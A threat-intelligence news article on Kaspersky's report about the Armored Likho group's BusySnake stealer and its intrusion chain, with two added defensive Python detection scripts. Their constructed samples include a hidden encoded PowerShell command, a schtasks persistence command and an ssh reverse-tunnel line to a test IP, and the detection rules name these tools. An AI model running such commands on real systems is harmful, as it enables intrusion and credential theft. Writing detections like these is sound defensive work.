A previously undocumented threat actor known as Armored Likho has been attributed to cyber attacks targeting government agencies and the electric power sector across Russia, Brazil, and Kazakhstan.
“Armored Likho blends financially motivated campaigns targeting private individuals with targeted cyber espionage aimed at organizations,” Kaspersky said in a technical analysis published today. “Their toolkit features obfuscated, modular RATs and infostealers specifically engineered to bypass dynamic analysis.”
The attacks are also characterized by the use of tools like Go2Tunnel for remote access and network tunneling. The wide variety of tools in its arsenal allows the threat actor to maintain persistent access to compromised hosts, steal credentials and sensitive data, and dynamically deliver modules tailored to the victim’s profile.
The Russian cybersecurity vendor said Armored Likho shares potential overlaps with a threat cluster tracked by BI.ZONE under the moniker Eagle Werewolf, which has been active since May 2023. The hacking group has a track record of targeting government and defense organizations, especially those involved in UAV development and manufacturing, using droppers, remote access Trojans (RATs), and utilities for establishing SSH tunnels.
“Threat actors may use compromised Telegram channels to distribute the malware,” BI.ZONE notes in its description of the threat actor. “While the group’s primary motivation is cyber-espionage, campaigns aimed at stealing funds from victims have also been recorded.”
Back in February 2026, Eagle Werewolf was observed compromising a drone-focused Telegram channel to distribute AquilaRAT via a Rust dropper that masquerades as a checklist for Starlink device activation. Also put to use in the attacks is Go2Tunnel, which establishes a reverse SSH tunnel to a command-and-control (C2) server using a private key.
The latest findings show that the threat actor has also employed a previously unreported Python-based information stealer named BusySnake Stealer targeting Windows systems, one version of which includes a module for stealing cookies from web browsers. The exact origins of Armored Likho remain unknown.
The starting point of the attack chain is a spear-phishing email that uses lures related to official government notices or social programs to distribute a RAR archive containing EXE binaries that serve as droppers for additional payloads retrieved from a GitHub repository, including the stealer payload.
The dropper malware also creates two Visual Basic Script (VBScript) files that are responsible for erasing traces of the initial execution as well as launching the stealer via a scheduled task.
Alternate chains utilize Windows shortcuts (LNK) instead of EXE payloads, weaponizing a now-patched vulnerability related to how Windows handles such files, resulting in remote code execution. The flaw, tracked as CVE-2025-9491 (aka ZDI-CAN-25373), was addressed by Microsoft as part of its Patch Tuesday updates for November 2025. Evidence unearthed by Trend Micro last year revealed that the vulnerability had been weaponized by a dozen hacking groups since 2017.
In the attack chain documented by Kaspersky, the shortcut vulnerability is abused to trigger the execution of an obfuscated PowerShell command that launches a loader responsible for displaying a decoy document while preparing the environment for the execution of the Python stealer. The malware then establishes persistence through a combination of a VBScript file and a scheduled task, as before.
The stealer, referred to as BusySnake, implements several evasion techniques to complicate static analysis and sidestep detection. Its primary goal is to establish communication with a C2 server and then await incoming instructions. It also supports the following functionality –
- Steal data from the system clipboard.
- Enumerate files across the system and log their metadata in a local database.
- Upload user documents to the C2 server.
- Capture screenshots and stage them in a local directory.
- Archive captured screenshots and remove previously created archives from the disk.
- Prevent multiple instances of the stealer from running concurrently on the infected host.
- Ensure persistence by checking if the scheduled task exists, and if not, drop a VBScript to register a new scheduled task.
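The chain described above (shortcut-triggered obfuscated PowerShell, a VBScript that registers a scheduled task, a background Python interpreter, and a reverse SSH tunnel) leaves a recognizable sequence in process-creation telemetry. The following is an added detection example written for this article; it is not Kaspersky's code and not part of the report. The events, paths, host names and command lines are constructed samples (the `-enc` PowerShell switch, the `pythonw.exe`/`.pyw` pairing and an `ssh.exe -R` invocation are assumed indicators, not values taken from the campaign), and the rule weights are arbitrary.

```python
"""
Added example (not from the article or Kaspersky): score constructed
process-creation events (Sysmon Event ID 1 style fields) for the chain
LNK -> obfuscated PowerShell -> VBScript -> scheduled task -> background
Python (.pyw) -> reverse SSH tunnel, aggregated per host.
Every event below is a constructed sample, not real telemetry.
"""
import re
from collections import defaultdict

# Directories a standard user can write to. A stealer staged under these is the
# expected case; an interpreter under Program Files is treated as benign here.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Downloads)\\", re.I)


def _basename(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


# (rule name, weight, predicate over one event). Weights are arbitrary.
RULES = [
    ("powershell_encoded_from_explorer", 3, lambda e:
        _basename(e["image"]) == "powershell.exe"
        and _basename(e["parent"]) == "explorer.exe"
        and re.search(r"(?i)(^|\s)-e(c|nc|ncodedcommand)?(\s|$)", e["cmdline"]) is not None),
    ("script_host_vbs_from_userdir", 2, lambda e:
        _basename(e["image"]) in ("wscript.exe", "cscript.exe")
        and ".vbs" in e["cmdline"].lower()
        and USER_WRITABLE.search(e["cmdline"]) is not None),
    ("schtasks_create_script_action", 3, lambda e:
        _basename(e["image"]) == "schtasks.exe"
        and re.search(r"(?i)/create\b", e["cmdline"]) is not None
        and re.search(r"(?i)\.(pyw|vbs)\b|pythonw|wscript|cscript", e["cmdline"]) is not None),
    ("pythonw_from_userdir", 2, lambda e:
        _basename(e["image"]) == "pythonw.exe"
        and USER_WRITABLE.search(e["image"]) is not None),
    ("ssh_reverse_tunnel", 4, lambda e:
        _basename(e["image"]) == "ssh.exe"
        and re.search(r"\s-R\s", e["cmdline"]) is not None),
]

# Constructed telemetry: ws01 shows the full chain, ws02 is benign noise.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFB"},
    {"host": "ws01", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\jdoe\AppData\Roaming\upd.vbs"},
    {"host": "ws01", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /Create /SC MINUTE /MO 5 /TN "Updater" /TR "C:\Users\jdoe\AppData\Roaming\py\pythonw.exe C:\Users\jdoe\AppData\Roaming\svc.pyw" /F'},
    {"host": "ws01", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Users\jdoe\AppData\Roaming\py\pythonw.exe",
     "cmdline": r"pythonw.exe C:\Users\jdoe\AppData\Roaming\svc.pyw"},
    {"host": "ws01", "parent": r"C:\Users\jdoe\AppData\Roaming\py\pythonw.exe",
     "image": r"C:\Users\jdoe\AppData\Roaming\ssh.exe",
     "cmdline": r"ssh.exe -N -R 9000:127.0.0.1:9000 -i C:\Users\jdoe\AppData\Roaming\id_ed25519 user@203.0.113.10"},
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Python312\pythonw.exe",
     "cmdline": r'"C:\Program Files\Python312\pythonw.exe" "C:\Program Files\Tool\gui.pyw"'},
]


def matched_rules(event):
    """Names of the rules a single event satisfies."""
    return [name for name, _w, pred in RULES if pred(event)]


def score_hosts(events, threshold=6):
    """Aggregate distinct rule hits per host; hosts at or above threshold are flagged.
    Scoring distinct rules (not raw hits) rewards the chain, not a noisy single stage."""
    weights = {name: w for name, w, _p in RULES}
    per_host = defaultdict(set)
    for e in events:
        per_host[e["host"]].update(matched_rules(e))
    flagged = {}
    for host, names in per_host.items():
        score = sum(weights[n] for n in names)
        if score >= threshold:
            flagged[host] = {"score": score, "rules": sorted(names)}
    return flagged


if __name__ == "__main__":
    for host, info in score_hosts(SAMPLE_EVENTS).items():
        print(host, info["score"], ", ".join(info["rules"]))
```

Any single stage here (a user launching `pythonw.exe`, or an encoded PowerShell command) is noisy on its own; the per-host aggregation is what makes the combination worth an alert, and the threshold should be tuned against a baseline of the environment's own telemetry before use.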
Furthermore, the commands issued by the C2 server allow it to take screenshots at a designated interval, log keystroke data, gather cryptocurrency wallet files with a JSON extension, collect Telegram session and credential data, establish a reverse SSH tunnel using Go2Tunnel, install RustDesk, and extract cookies from Mozilla Firefox and Chromium-based browsers, along with passwords.
If RustDesk is already installed on the machine, the open-source remote desktop software is started, and the victim is prompted to enter their credentials, following which the stealer grabs a screenshot of the credentials and exfiltrates it to the C2 server.
“The malware dynamically decrypts its bytecode only at the exact moment a function is called, re-encrypting the data immediately afterward,” Kaspersky said. “Additionally, the malware runs in the background without spawning a console window, as indicated by its PYW file extension.”
Kaspersky said it also identified a newer version of BusySnake that iterates upon the predecessor’s architectural design to include a new task-management framework to handle incoming C2 commands and dynamically assign them operational statuses, such as SCHEDULED, IN_PROGRESS, SUCCEEDED, or FAILED, for improved reporting back to the server.
The threat actor’s ties to Eagle Werewolf also stem from overlaps between AquilaRAT and BusySnake Stealer, particularly in the manner both malware families receive tasks from the C2 server, register persistence via scheduled tasks, and utilize similar endpoints for C2 communications.
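Both families persist through a scheduled task, so a task inventory is a natural hunting artifact on suspect hosts. The following added example is not the report's or either malware family's code: it triages the CSV produced by `schtasks /query /fo CSV /v` for actions that look like the pattern described above (a script host running a `.vbs`, a windowless `pythonw.exe` running a `.pyw`, binaries under user-writable paths, or an SSH reverse tunnel). The rows are constructed samples reduced to the columns the triage reads, and the indicator patterns are assumptions, not values from the campaign.

```python
"""
Added example (not from the article, Kaspersky, or BI.ZONE): triage a
scheduled-task inventory for the persistence pattern the article describes.
Input is the CSV that `schtasks /query /fo CSV /v` emits; the sample keeps only
the columns used here, and every row is constructed, not a real task.
"""
import csv
import io
import re

# Constructed sample. Column names are those of schtasks /v output; the real
# output carries many more columns, which csv.DictReader simply ignores.
SAMPLE_CSV = r'''"HostName","TaskName","Author","Task To Run","Run As User","Schedule Type"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM","Weekly"
"WS01","\Updater","WS01\jdoe","C:\Users\jdoe\AppData\Roaming\py\pythonw.exe C:\Users\jdoe\AppData\Roaming\svc.pyw","WS01\jdoe","Hourly"
"WS01","\VendorUpdate","Vendor","C:\Program Files\Vendor\update.exe /silent","SYSTEM","Daily"
"WS01","\Sync","WS01\jdoe","wscript.exe //B C:\Users\jdoe\AppData\Roaming\reg.vbs","WS01\jdoe","At logon"
'''

# Each indicator is matched against the task action ("Task To Run").
INDICATORS = [
    # wscript/cscript launching a VBScript, as in the dropper's persistence step
    ("script_host_vbs", re.compile(r"(?i)\b[wc]script(\.exe)?\b.*\.vbs\b")),
    # windowless interpreter or .pyw payload (no console window, per the report)
    ("hidden_python", re.compile(r"(?i)\bpythonw(\.exe)?\b|\.pyw\b")),
    # action lives under a directory a standard user can write to
    ("user_writable_path", re.compile(r"(?i)\\(AppData|Temp|ProgramData|Downloads)\\")),
    # ssh client with a remote (reverse) forward; case-sensitive on purpose
    ("reverse_ssh", re.compile(r"\bssh(\.exe)?\b.*\s-R\s")),
]


def triage_tasks(csv_text):
    """Return tasks whose action matches at least one indicator, most suspicious first."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        action = row.get("Task To Run", "") or ""
        reasons = [name for name, rx in INDICATORS if rx.search(action)]
        if reasons:
            findings.append({
                "task": row.get("TaskName", ""),
                "author": row.get("Author", ""),
                "run_as": row.get("Run As User", ""),
                "action": action,
                "reasons": reasons,
            })
    # more indicators first, then stable by task name for repeatable reports
    findings.sort(key=lambda f: (-len(f["reasons"]), f["task"]))
    return findings


if __name__ == "__main__":
    for f in triage_tasks(SAMPLE_CSV):
        print(f"{f['task']:<12} run_as={f['run_as']:<12} {', '.join(f['reasons'])}")
        print(f"    {f['action']}")
```

On a real host the CSV comes from redirecting the `schtasks` command to a file and reading it with the system's console encoding; the author and run-as columns matter because a task both created by and running as the interactive user, with an action under that user's profile, is the shape the report describes, whereas vendor tasks under `Program Files` running as SYSTEM are the usual benign population.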
There are also indications that the first-stage payloads comprising loaders and stagers were likely generated with assistance from artificial intelligence (AI) tools, given the presence of redundant comments and code blocks.
“This campaign highlights several concurrent trends: the growing technical maturity of Armored Likho, tool polymorphism, and a shift toward more complex schemes aimed at bypassing security solutions – ranging from Python source code obfuscation to embedding network mechanisms directly into the malware code,” Kaspersky said.
“In parallel, the group is aggressively refining and modifying its core toolkit. While Go2Tunnel previously operated as a standalone utility, its reverse-tunneling functionality has now been integrated directly into the stealer as a built-in feature that ingests parameters from the C2 server.”